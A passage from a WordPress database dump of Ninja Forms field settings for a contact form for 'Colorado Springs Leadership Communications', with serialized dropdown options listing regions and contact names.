Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8481,121,'field_key','textbox_33','field_key','textbox_33'),(8482,121,'custom_name_attribute','','custom_name_attribute',''),(8483,121,'personally_identifiable','','personally_identifiable',''),(8484,121,'value','','value',''),(8485,122,'field_label','Last Name','field_label','Last Name'),(8486,122,'field_key','lastname_34','field_key','lastname_34'),(8487,122,'custom_name_attribute','lname','custom_name_attribute','lname'),(3576,113,'key','listselect_122','key','listselect_122'),(3577,113,'container_class','one-half first','container_class','one-half first'),(3578,113,'parent_id','11','parent_id','11'),(12109,378,'personally_identifiable','1','personally_identifiable','1'),(12108,378,'custom_name_attribute','lname','custom_name_attribute','lname'),(12107,378,'field_key','lastname_22','field_key','lastname_22'),(12105,377,'idAttribute','id','idAttribute','id'),(12106,378,'field_label','Last Name','field_label','Last Name'),(12104,377,'drawerDisabled','','drawerDisabled',''),(12102,377,'custom_mask','','custom_mask',''),(12103,377,'parent_id','8','parent_id','8'),(12101,377,'manual_key','','manual_key',''),(12100,377,'container_class','one-half first','container_class','one-half first'),(12096,377,'element_class','','element_class',''),(12097,377,'required','1','required','1'),(12095,377,'desc_text','','desc_text',''),(12093,377,'show_desc','0','show_desc','0'),(12094,377,'desc_pos','none','desc_pos','none'),(12092,377,'user_info_field_group_custom','','user_info_field_group_custom',''),(12085,377,'input_limit_type','char','input_limit_type','char'),(12086,377,'input_limit_msg','','input_limit_msg',''),(12087,377,'user_state','0','user_state','0'),(12088,377,'autocomplete_off','0','autocomplete_off','0'),(12089,377,'num_sort','0','num_sort','0'),(12090,377,'admin_label','','admin_label',''),(12091,377,'user_info_field_group_name','','user_info_field_group_name',''),(12084,377,'input_limit','','input_limit',''),(12083,377,'disable_input','0','disable_input','0'),(12076,377,'placeholder','','placeholder',''),(12077,377,'user_address_1','','user_address_1',''),(12078,377,'user_address_2','','user_address_2',''),(12079,377,'user_city','','user_city',''),(12080,377,'user_zip','','user_zip',''),(12081,377,'user_phone','','user_phone',''),(12082,377,'user_email','','user_email',''),(12072,377,'show_help','0','show_help','0'),(12073,377,'help_text','','help_text',''),(12074,377,'calc_auto_include','0','calc_auto_include','0'),(12075,377,'calc_option','0','calc_option','0'),(3610,116,'objectType','Field','objectType','Field'),(3611,116,'objectDomain','fields','objectDomain','fields'),(3612,116,'editActive','','editActive',''),(3613,116,'order','7','order','7'),(3614,116,'type','listselect','type','listselect'),(3615,116,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(3616,116,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3617,116,'label_pos','above','label_pos','above'),(3618,116,'list_type','dropdown','list_type','dropdown'),(3619,116,'multi_size','5','multi_size','5'),(3620,116,'list_show_value','1','list_show_value','1'),(3621,116,'list','a:0:{}','list','a:0:{}'),(3622,116,'user_info_field_group','','user_info_field_group',''),(3623,116,'calc_auto_include','0','calc_auto_include','0'),(3624,116,'user_state','0','user_state','0'),(3625,116,'num_sort','0','num_sort','0'),(3626,116,'admin_label','','admin_label',''),(3627,116,'show_help','0','show_help','0'),(3628,116,'help_text','','help_text',''),(3629,116,'show_desc','0','show_desc','0'),(3630,116,'desc_pos','none','desc_pos','none'),(3631,116,'desc_text','','desc_text',''),(3632,116,'element_class','','element_class',''),(3633,116,'required','1','required','1'),(3634,116,'options','a:4:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"Initiator-Joan Riester\";s:5:\"value\";s:22:\"Initiator-Joan Riester\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:37:\"ESA/Initiator-Bonnie Alexander-Reeves\";s:5:\"value\";s:37:\"ESA/Initiator-Bonnie Alexander-Reeves\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:3;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:25:\"ESA/Initiator-Jane Taylor\";s:5:\"value\";s:25:\"ESA-Initiator-Jane Taylor\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}','options','a:4:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"Initiator-Joan Riester\";s:5:\"value\";s:22:\"Initiator-Joan Riester\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:37:\"ESA/Initiator-Bonnie Alexander-Reeves\";s:5:\"value\";s:37:\"ESA/Initiator-Bonnie Alexander-Reeves\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:3;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:25:\"ESA/Initiator-Jane Taylor\";s:5:\"value\";s:25:\"ESA-Initiator-Jane Taylor\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}'),(8477,120,'field_label','Text','field_label','Text'),(8478,120,'field_key','html_32','field_key','html_32'),(8479,120,'drawerDisabled','','drawerDisabled',''),(8480,121,'field_label','First Name','field_label','First Name'),(3635,116,'key','select_the_person_you_would_like_to_contact_1613166439207','key','select_the_person_you_would_like_to_contact_1613166439207'),(3636,116,'container_class','one-half','container_class','one-half'),(3637,116,'drawerDisabled','','drawerDisabled',''),(3638,116,'parent_id','11','parent_id','11'),(3639,117,'objectType','Field','objectType','Field'),(3640,117,'objectDomain','fields','objectDomain','fields'),(3641,117,'editActive','','editActive',''),(3642,117,'order','8','order','8'),(3643,117,'type','textarea','type','textarea'),(3644,117,'label','Enter Your Message Here','label','Enter Your Message Here'),(3645,117,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3646,117,'label_pos','above','label_pos','above'),(3647,117,'default_value','','default_value',''),(3648,117,'textarea_rte','0','textarea_rte','0'),(3649,117,'textarea_media','0','textarea_media','0'),(3650,117,'disable_rte_mobile','0','disable_rte_mobile','0'),(3651,117,'input_limit','','input_limit',''),(3652,117,'input_limit_type','char','input_limit_type','char'),(3653,117,'calc_auto_include','0','calc_auto_include','0'),(3654,117,'num_sort','0','num_sort','0'),(3655,117,'admin_label','','admin_label',''),(3656,117,'show_help','0','show_help','0'),(3657,117,'help_text','','help_text',''),(3658,117,'show_desc','0','show_desc','0'),(3659,117,'desc_pos','none','desc_pos','none'),(3660,117,'desc_text','','desc_text',''),(3661,117,'element_class','','element_class',''),(3662,117,'required','1','required','1'),(3663,117,'default','','default',''),(3664,117,'key','textarea_126','key','textarea_126'),(3665,117,'placeholder','','placeholder',''),(3666,117,'container_class','','container_class',''),(3667,117,'manual_key','','manual_key',''),(3668,117,'parent_id','11','parent_id','11'),(17545,629,'editActive','','editActive',''),(17544,628,'drawerDisabled','','drawerDisabled',''),(17543,628,'key','html_1663800453785','key','html_1663800453785'),(17542,628,'element_class','','element_class',''),(17541,628,'container_class','','container_class',''),(17540,628,'default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(3686,119,'objectType','Field','objectType','Field'),(3687,119,'objectDomain','fields','objectDomain','fields'),(3688,119,'editActive','','editActive',''),(3689,119,'order','10','order','10'),(3690,119,'type','submit','type','submit'),(3691,119,'label','Submit','label','Submit'),(3692,119,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3693,119,'show_help','0','show_help','0'),(3694,119,'help_text','','help_text',''),(3695,119,'show_desc','0','show_desc','0'),(3696,119,'desc_pos','none','desc_pos','none'),(3697,119,'desc_text','','desc_text',''),(3698,119,'processing_label','Processing','processing_label','Processing'),(3699,119,'element_class','','element_class',''),(3700,119,'key','submit_128','key','submit_128'),(3701,119,'container_class','','container_class',''),(3702,119,'parent_id','11','parent_id','11'),(3703,120,'objectType','Field','objectType','Field'),(3704,120,'objectDomain','fields','objectDomain','fields'),(3705,120,'editActive','','editActive',''),(3706,120,'order','1','order','1'),(3707,120,'type','html','type','html'),(3708,120,'label','Text','label','Text'),(3709,120,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3710,120,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Communications</span></span></span></strong></span></h3>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Communications</span></span></span></strong></span></h3>'),(3711,120,'desc_el','div','desc_el','div'),(3712,120,'show_desc','0','show_desc','0'),(3713,120,'desc_pos','none','desc_pos','none'),(3714,120,'desc_text','','desc_text',''),(3715,120,'element_class','','element_class',''),(3716,120,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Communications</span></span></span></strong></span></h3>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Communications</span></span></span></strong></span></h3>'),(3717,120,'key','html_32','key','html_32'),(3718,120,'container_class','','container_class',''),(3719,120,'parent_id','12','parent_id','12'),(3720,121,'objectType','Field','objectType','Field'),(3721,121,'objectDomain','fields','objectDomain','fields'),(3722,121,'editActive','','editActive',''),(3723,121,'order','2','order','2'),(3724,121,'type','textbox','type','textbox'),(3725,121,'def_id','6','def_id','6'),(3726,121,'label','First Name','label','First Name'),(3727,121,'label_pos','above','label_pos','above'),(3728,121,'mask','','mask',''),(3729,121,'datepicker','0','datepicker','0'),(3730,121,'first_name','1','first_name','1'),(3731,121,'last_name','0','last_name','0'),(3732,121,'from_name','0','from_name','0'),(3733,121,'user_info_field_group','1','user_info_field_group','1'),(3734,121,'show_help','0','show_help','0'),(3735,121,'help_text','','help_text',''),(3736,121,'calc_auto_include','0','calc_auto_include','0'),(3737,121,'calc_option','0','calc_option','0'),(3738,121,'placeholder','','placeholder',''),(3739,121,'user_address_1','','user_address_1',''),(3740,121,'user_address_2','','user_address_2',''),(3741,121,'user_city','','user_city',''),(3742,121,'user_zip','','user_zip',''),(3743,121,'user_phone','','user_phone',''),(3744,121,'user_email','','user_email',''),(3745,121,'disable_input','0','disable_input','0'),(3746,121,'input_limit','','input_limit',''),(3747,121,'input_limit_type','char','input_limit_type','char'),(3748,121,'input_limit_msg','','input_limit_msg',''),(3749,121,'user_state','0','user_state','0'),(3750,121,'autocomplete_off','0','autocomplete_off','0'),(3751,121,'num_sort','0','num_sort','0'),(3752,121,'admin_label','','admin_label',''),(3753,121,'user_info_field_group_name','','user_info_field_group_name',''),(3754,121,'user_info_field_group_custom','','user_info_field_group_custom',''),(3755,121,'show_desc','0','show_desc','0'),(3756,121,'desc_pos','none','desc_pos','none'),(3757,121,'desc_text','','desc_text',''),(3758,121,'element_class','','element_class',''),(3759,121,'required','1','required','1'),(3760,121,'key','textbox_33','key','textbox_33'),(3761,121,'default','','default',''),(3762,121,'container_class','one-half first','container_class','one-half first'),(3763,121,'manual_key','','manual_key',''),(3764,121,'custom_mask','','custom_mask',''),(3765,121,'parent_id','12','parent_id','12'),(3766,122,'objectType','Field','objectType','Field'),(3767,122,'objectDomain','fields','objectDomain','fields'),(3768,122,'editActive','','editActive',''),(3769,122,'order','3','order','3'),(3770,122,'type','lastname','type','lastname'),(3771,122,'def_id','7','def_id','7'),(3772,122,'label','Last Name','label','Last 